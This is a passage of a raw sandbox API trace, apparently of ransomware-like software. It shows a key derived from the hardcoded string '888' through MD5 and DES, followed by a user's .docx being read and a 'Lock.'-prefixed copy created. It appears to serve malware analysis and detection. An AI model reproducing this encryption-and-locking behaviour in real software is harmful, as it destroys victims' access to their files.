Size=0x8) returned 0x2a72738 [0215.045] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0215.045] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab770 [0215.045] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab740 [0215.045] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0215.045] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab980 [0215.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0215.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab980 | out: hHeap=0x2af0000) returned 1 [0215.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab740 | out: hHeap=0x2af0000) returned 1 [0215.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab770 | out: hHeap=0x2af0000) returned 1 [0215.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0215.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0215.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73db8 | out: hHeap=0x2af0000) returned 1 [0215.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8f0 | out: hHeap=0x2af0000) returned 1 [0215.045] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0215.045] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f60 [0215.045] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8a8 [0215.045] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab878 [0215.046] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0215.046] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab740 [0215.046] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0215.046] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab740 | out: hHeap=0x2af0000) returned 1 [0215.046] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab878 | out: hHeap=0x2af0000) returned 1 [0215.046] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8a8 | out: hHeap=0x2af0000) returned 1 [0215.046] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f60 | out: hHeap=0x2af0000) returned 1 [0215.046] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0215.046] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0215.046] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec40 [0215.046] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0215.046] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec40 | out: hHeap=0x2af0000) returned 1 [0215.046] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0215.046] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0215.046] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722a8 [0215.046] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0215.046] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77be8 | out: hHeap=0x2af0000) returned 1 [0215.046] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0215.046] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab830 [0215.046] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73a58 [0215.046] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0215.046] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0215.046] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0215.046] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77be8 | out: hHeap=0x2af0000) returned 1 [0215.046] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0215.046] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab770 | out: hHeap=0x2af0000) returned 1 [0215.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab740 | out: hHeap=0x2af0000) returned 1 [0215.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab980 | out: hHeap=0x2af0000) returned 1 [0215.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0215.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0215.047] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0215.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e940 | out: hHeap=0x2af0000) returned 1 [0215.047] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0215.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0215.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab740 | out: hHeap=0x2af0000) returned 1 [0215.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab878 | out: hHeap=0x2af0000) returned 1 [0215.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab860 | out: hHeap=0x2af0000) returned 1 [0215.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0215.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0215.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab920 | out: hHeap=0x2af0000) returned 1 [0215.047] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0215.047] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0215.047] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.047] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.047] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0215.047] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0215.047] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0215.047] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0215.047] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0215.047] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0215.047] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0215.047] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0215.048] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0215.048] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0215.048] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0215.048] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0215.048] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aaba70, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0215.048] CryptCreateHash (in: hProv=0xa7be68, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0215.048] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.048] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.048] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.048] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.048] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0215.048] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a72748, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0215.048] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0215.048] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.048] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0215.048] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a72748, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0215.048] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.049] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0215.049] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0215.049] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0215.049] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0215.049] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0215.049] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0215.049] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0215.049] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aabc08, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0215.049] CryptHashData (hHash=0x9e1c38, pbData=0x2a72778, dwDataLen=0x3, dwFlags=0x1) returned 1 [0215.049] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.049] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.049] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.049] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0215.049] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0215.049] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0215.049] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0215.049] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0215.049] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0215.049] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0215.049] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0215.049] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0215.049] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0215.049] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0215.049] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0215.050] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aabcb0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0215.050] CryptDeriveKey (in: hProv=0xa7be68, Algid=0x6601, hBaseData=0x9e1c38, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9e1cb8) returned 1 [0215.050] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.050] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.050] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.050] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.050] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.050] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.050] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0215.050] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0215.050] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0215.050] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0215.050] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0215.050] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0215.050] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0215.050] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f7220, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0215.050] CryptDestroyHash (hHash=0x9e1c38) returned 1 [0215.050] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.050] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.050] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.050] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.050] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.051] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents/23iZdkXXLok6512uz.docx" (normalized: "c:\\users\\fd1hvy\\documents\\23izdkxxlok6512uz.docx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x510 [0215.051] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0215.052] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0215.052] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.052] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.052] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.052] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents/" (normalized: "c:\\users\\fd1hvy\\documents")) returned 0x11 [0215.052] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents/Lock.23iZdkXXLok6512uz.docx" (normalized: "c:\\users\\fd1hvy\\documents\\lock.23izdkxxlok6512uz.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x504 [0215.053] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.053] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.053] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.053] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.056] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0215.056] ReadFile (in: hFile=0x510, lpBuffer=0x3855010, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3855010*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0215.059] ReadFile (in: hFile=0x510, lpBuffer=0x3855010, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3855010*, lpNumberOfBytesRead=0x8cf4f8*=0x1490, lpOverlapped=0x0) returned 1 [0215.059] ReadFile (in: hFile=0x510, lpBuffer=0x3855010, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3855010*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0215.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0215.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0215.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0215.059] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72258 [0215.059] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x11490) returned 0x2a8a138 [0215.060] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x50ed020 | out: hHeap=0x2af0000) returned 1 [0215.062] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0215.062] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaff0 | out: hHeap=0x2af0000) returned 1 [0215.062] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0215.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0215.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0215.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0215.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0215.063] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72248 [0215.063] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x11490) returned 0x2aae878 [0215.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a8a138 | out: hHeap=0x2af0000) returned 1 [0215.063] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0215.063] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.063] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72378 [0215.063] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0215.064] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0215.064] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0215.064] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722c8 [0215.064] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x11490) returned 0x2a8a138 [0215.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0215.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a8a138 | out: hHeap=0x2af0000) returned 1 [0215.064] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0215.064] 